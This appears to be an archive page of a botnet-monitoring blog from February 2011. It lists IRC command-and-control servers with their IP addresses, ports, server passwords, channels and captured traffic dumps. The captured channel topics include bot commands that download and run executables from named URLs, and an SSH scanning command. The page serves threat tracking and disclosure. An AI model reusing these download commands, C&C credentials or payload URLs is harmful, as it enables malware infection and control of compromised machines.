Month: February 2011

sw.maximum-irc.info(botnet hosted in Greece Foundation Of Research And Technology Hellas)

Uncategorized

sw.maximum-irc.info DNS_TYPE_A 147.230.32.174 178.63.131.187 139.91.102.101 147.230.32.174:9595 Nick: {NEW}[AUS][XP]471335 Username: svr-4138 Joined Channel: #swarm# Channel Topic for Channel #swarm#: “.dl http://dl.dropbox.com/u/19204559/ms1.exe sun.exe 1 -s” Private Message to Channel #swarm#: “Executed process “sun.exe”.” Now talking in #swarm# Topic On: [ #swarm# ] [ .update http://dickolsthoorn.nl/dn.exe win.exe 1 ] Topic By: [ me ] Modes On: [ #swarm#Read more...

ssh.bl4ze.info(botnet hosted in Czech Republic Liberec Technical University Of Liberec)

Uncategorized

Botnet C&C irc ssh.bl4ze.info DNS_TYPE_A 93.62.62.208 93.62.62.208:8782 Nick: :{00-AUS-XP-pc1-9923} Username: blaze Server Pass: weed Joined Channel: #sshscan2 Channel Topic for Channel #sshscan2: “.scan sshgodscan 100 5 0 193.x.x.x -b -r -n” Private Message to User {iNF-00-AUT-XP-pxb8x8cI: “SC// Random Port Scan started on 193.x.x.x:22 with a delay of 5 seconds for 0 minutes using 100 threads.”Read more...

91.217.162.108(bfbot hosted in Ukraine Voejkova Nadezhda)

Uncategorized

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 91.217.162.230 80 91.217.162.80 80 61.158.145.4 7196 PASS laorosr IRCD here 91.217.162.108 1110 PASS eee bfbot here udp protocol MODE [N00_USA_XP_0000146] @ -ix PRIVMSG #dpi :Done.. 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341Read more...

173.163.151.27(botnet hosted in United States Mechanicsburg Comcast Business Communications Inc)

Uncategorized

Remote Host Port Number 173.163.151.27 9595 PASS prison NICK {iNF-00-USA-XP-COMP-1754} USER MEAT * 0 :COMP NICK {00-USA-XP-COMP-1754} 173.163.151.27:9595 Nick: :{00-AUT-XP-pc3-3772} Username: MEAT Server Pass: prison Joined Channel: #1 Joined Channel: ###meat Joined Channel: ##http## Joined Channel: ####meat### Channel Topic for Channel ##http##: “.j #1 |j. ###meat |.p ##http##” Channel Topic for Channel ####meat###: “.http http://193.194.67.18/m.exeRead more...

feb.scorevidic.net(botnet hosted in United States Baltimore Gandi Us Inc)

Uncategorized

Remote Host Port Number feb.scorevidic.net 5900 Resolved : [feb.scorevidic.net] To [173.246.103.17] Resolved : [feb.scorevidic.net] To [173.246.103.19] NICK VirUs-zlxuiykn USER VirUs “” “zte” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. JOIN #Rana1# Virus PONG :TESTING1.VirUs.HERE 00000000 | 5041 5353 2056 6972 7573 0D0A 4E49 434B | PASS Virus..NICK 00000010 | 2056 6972 5573 2D78 7565 757A 7966 790D | VirUs-xueuzyfy.Read more...

95.154.237.183(botnet hosted in Amsterdam)

Uncategorized

Remote Host Port Number 95.154.237.183 6667 PASS timu MODE USA|87388 -x+i JOIN #1 timu USERHOST USA|87388 NICK USA|87388 USER otjzn 0 0 :USA|87388 infos about hosting: http://whois.domaintools.com/95.154.237.183